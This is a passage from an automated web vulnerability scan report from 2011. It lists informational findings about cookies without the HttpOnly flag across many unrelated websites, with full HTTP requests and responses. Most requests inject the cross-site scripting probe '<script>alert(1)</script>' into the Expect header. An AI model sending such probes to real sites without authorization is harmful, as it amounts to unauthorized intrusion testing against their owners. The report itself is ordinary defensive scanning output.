<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
17.124. http://www.dirtrider.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dirtrider.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dirtrider.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:20:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=egt43x45tiwnren54mtoic55; path=/; HttpOnly
Set-Cookie: UserPuid=2331437118715581986; domain=dirtrider.com; expires=Mon, 02-May-2061 00:20:09 GMT; path=/
Cache-Control: private
Content-Type: image/x-icon
Content-Length: 43

GIF89a.......|.8...!.......,...........D..;
17.125. http://www.docufide.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.docufide.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.docufide.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Sun, 01 May 2011 23:30:40 GMT
Server: docufide webserver
Content-Length: 455
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: LB-cookie-20480-prodweblb tomcat=AKODKIMAFAAA; Expires=Mon, 02-May-2011 03:29:58 GMT; Path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
17.126. http://www.ebuilders.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebuilders.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ebuilders.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: http://media.ebuilders.com/i/favicon.ico
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=rzzmwgjp001tep55x2ukkrjl; path=/; HttpOnly
Set-Cookie: PSGUID=5594d226-e5be-4106-b3b3-b1e542925e6f; expires=Wed, 01-Jun-2011 00:25:47 GMT; path=/
X-AspNet-Version: 2.0.50727
Server-Name: MIS-WEB90B
P3P: CP="CAO PSA OUR"
Date: Mon, 02 May 2011 00:25:46 GMT
Content-Length: 0
Set-Cookie: BIGipServerWEBFX-1=2483174410.20480.0000; path=/

17.127. http://www.eiprofile.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eiprofile.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.eiprofile.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: LinkTrust
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:24:21 GMT
Set-Cookie: BIGipServerhttp_pool=168106924.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
17.128. http://www.floridamoves.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floridamoves.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.floridamoves.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: floridamoves.com=R1517074728; path=/
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:16:40 GMT

17.129. http://www.foxytube.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxytube.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.foxytube.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Sun, 01 May 2011 23:26:41 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
Vary: Accept-Encoding
Content-Length: 508
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: RNLBSERVERID=ded692; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
17.130. http://www.girlscoutshop.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.girlscoutshop.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.girlscoutshop.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:12:17 GMT
Set-Cookie: Tagalongs=riO5PsabbXwW/jmNvdrCAAyuQhFbkSqprTgGgcTwFatwy+hDa+sjuREUHMnEPSREah6HH9fj19J6Iw==; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
17.131. http://www.gohawaii.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gohawaii.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gohawaii.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: ARPT=XKQRVMS192.168.10.48CKMLW; path=/
Date: Sun, 01 May 2011 23:49:22 GMT
Server: Apache/2.0.52 (Red Hat)
Content-Length: 472
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
17.132. http://www.greenhulk.net/forums/archive/index.php/t-126285.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/archive/index.php/t-126285.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forums/archive/index.php/t-126285.html HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 02:03:16 GMT
Server: Apache
Set-Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; path=/; domain=.greenhulk.net; HttpOnly
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:03:16 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:03:16 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Location: http://www.greenhulk.net/forums/showthread.php?126285-Rear-boarding-step&s=95336a5715caddfe645c46b8976e18eb
Expires: Mon, 02 May 2011 02:03:16 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 0

17.133. http://www.greenhulk.net/forums/login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/login.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /forums/login.php?do=login HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/register.php
Cache-Control: max-age=0
Origin: http://www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; __utmz=109700179.1304319910.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gh_lastactivity=0; __utma=109700179.1539471416.1304319910.1304319910.1304319910.1; __utmc=109700179; __utmb=109700179.2.10.1304319910
Content-Length: 222

vb_login_username=User+Name&vb_login_password_hint=Password&vb_login_password=&s=&securitytoken=guest&do=login&vb_login_md5password=d41d8cd98f00b204e9800998ecf8427e&vb_login_md5password_utf=d41d8cd98f
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:30:42 GMT
Server: Apache
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:30:42 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:30:42 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:30:42 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" id="vbulletin_
...[SNIP]...
17.134. http://www.greenhulk.net/forums/register.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/register.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forums/register.php HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/showthread.php?126285-Rear-boarding-step
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; gh_lastactivity=0; __utmz=109700179.1304319910.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=109700179.1539471416.1304319910.1304319910.1304319910.1; __utmc=109700179; __utmb=109700179.1.10.1304319910

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:28:52 GMT
Server: Apache
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:28:52 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:28:52 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:28:52 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <me
...[SNIP]...
17.135. http://www.illinoishomepage.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.illinoishomepage.net
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.illinoishomepage.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Sun, 01 May 2011 23:51:13 GMT
Server: Apache/2.2.15 (Fedora)
Content-Length: 479
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerDallasPool=362156042.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
17.136. http://www.innerstaru.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.innerstaru.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.innerstaru.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Content-Length: 160
Content-Type: text/html
Location: http://web.innerstaru.com/favicon.ico
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:25:46 GMT
Set-Cookie: NSC_Cbscjf_Xfcgbsn=440af0ab3660;expires=Mon, 02-May-11 00:28:17 GMT;path=/

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://web.innerstaru.com/favicon.ico">here</a></body>
17.137. http://www.inthecompanyofdogs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inthecompanyofdogs.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.inthecompanyofdogs.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Mon, 02 May 2011 00:51:14 GMT
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: balance=2M1ypXByvVJuGHDAJvHKqcVFSE/syX008woxPohsNZA4Gq0FJM7p07+zV+a3u/rRuIvzJkQeVTGYyg==; path=/

17.138. http://www.kasperskylabs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kasperskylabs.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kasperskylabs.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.8.54
Date: Sun, 01 May 2011 23:49:23 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: http://www.kaspersky.com/favicon.ico
Set-Cookie: uid=AAAAA0298YMIw1W7BP2KAg==; path=/

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/0.8.54</center>
</body>
</html>
17.139. http://www.kucourses.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kucourses.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kucourses.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:16:10 GMT
Set-Cookie: BIGipServerKAPLAN=252823562.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
17.140. http://www.kylotteryretailers.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kylotteryretailers.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kylotteryretailers.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Mon, 02 May 2011 00:33:35 GMT
Server: IBM_HTTP_Server
Vary: Accept-Encoding
Content-Length: 476
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: Coyote-2-a010362=a010302:0;Domain=kylotteryretailers.com;Path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
17.141. http://www.libertytax.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.libertytax.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.libertytax.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 File Not Found
Date: Mon, 02 May 2011 00:57:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.libertytax.com&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=0621ba46-67a6-42c2-b166-b97cb6c7d237; expires=Wed, 02-May-2012 00:57:12 GMT; path=/
Set-Cookie: EkAnalytics=0; expires=Wed, 02-May-2012 00:57:12 GMT; path=/
Set-Cookie: ASP.NET_SessionId=hmhpti2mdueiki45l3cinf45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3375


<!DOCTYPE html>
<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>
   404 Page Not Found
</title><script id="EktronJS" type="text/javascript" src="/Wo
...[SNIP]...
17.142. http://www.mytelus.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mytelus.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mytelus.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Mon, 02 May 2011 00:19:38 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7d
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServermt-fe-proxies=1422633152.20480.0000; expires=Mon, 02-May-2011 04:50:53 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
17.143. http://www.nextworth.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextworth.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nextworth.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Mon, 02 May 2011 00:18:00 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 471
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: nx123=APACHE1; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
17.144. http://www.oshkosh365.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oshkosh365.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.oshkosh365.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:36:09 GMT
Connection: keep-alive
Set-Cookie: BIGipServerwebservers-http-pool=1191252140.20480.0000; path=/

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>
17.145. http://www.plosone.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.plosone.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.plosone.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Sun, 01 May 2011 23:45:13 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 469
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: Coyote-2-95144505=9514450c:0; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
17.146. http://www.pluspets.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pluspets.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pluspets.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: http://media.pluspets.com/i/favicon.ico
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=aagouvnxe53hn355tno0xe55; path=/; HttpOnly
Set-Cookie: PSGUID=c183fb00-3203-4395-8eef-169e29e16bd5; expires=Wed, 01-Jun-2011 00:22:19 GMT; path=/
Set-Cookie: Recipe-=,default,,; expires=Tue, 03-May-2011 00:22:19 GMT; path=/
X-AspNet-Version: 2.0.50727
Server-Name: MIS-WEB90A
P3P: CP="CAO PSA OUR"
Date: Mon, 02 May 2011 00:22:19 GMT
Content-Length: 0
Set-Cookie: BIGipServerWEBFX-2=2550283274.20480.0000; path=/

17.147. http://www.quiltingboard.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quiltingboard.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.quiltingboard.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Mon, 02 May 2011 00:22:34 GMT
Server: Apache/2.2.17 (EL)
Vary: Accept-Encoding
Content-Length: 472
X-Cnection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerquiltingboard_POOL=1390678188.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
17.148. http://www.ronniesmailorder.com/fiche_select.asp  previous  next

Summary

